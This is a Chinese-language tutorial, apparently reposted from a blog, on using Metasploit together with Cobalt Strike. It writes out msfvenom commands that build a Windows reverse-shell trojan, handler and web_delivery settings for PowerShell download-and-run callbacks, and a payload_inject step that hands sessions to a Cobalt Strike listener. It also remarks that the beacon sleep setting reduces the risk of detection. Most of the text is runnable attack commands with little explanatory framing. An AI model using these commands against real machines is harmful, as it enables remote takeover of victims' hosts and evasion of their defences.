MSF與CS聯動


 

MSF上線CS

 

1.MSF運行exe上線

先用msfvenom生成一個木馬,這里是windows的木馬

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.255.128 LPORT=6666 -f exe >/root/Payload/msf.exe

然后到主機中運行exe

msf監聽得到session

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.255.128
set lport 6666
exploit

 

 

 

2.powershell上線

使用powershell上線MSF

使用的不是msf中exploit/multi/handler模塊,而是使用的exploit/multi/script/web_delivery

use exploit/multi/script/web_delivery
set target 2 注意這里是 target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.255.128
set lport 6666
run

 

然后復制生成的powershell到windows主機中執行powershell

 

 

成功上線

 

 

 

 

 

 

 

 

啟動cs

 

MSF上使用payload_inject模塊

use exploit/windows/local/payload_inject 
使用該模塊可以將 Metasploit 獲取到的會話注入到CS中 set DisablePayloadHandler true 用來禁用 Metasploit payload handler的監聽 因為要監聽到cs上 set lhost xxx CSIP
set lport 7869 CS上的listen端口
set session 10 要轉發的session

 

 

 

 

 

 

 

 成功上線cs

 

 

 

 在interact交互的時候執行命令返回很慢,是因為cs自帶有sleep機制 這樣可以減少被檢測出的風險

可以通過sleep 1 調整休眠時間

 

 然后再執行命令響應就很快了

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM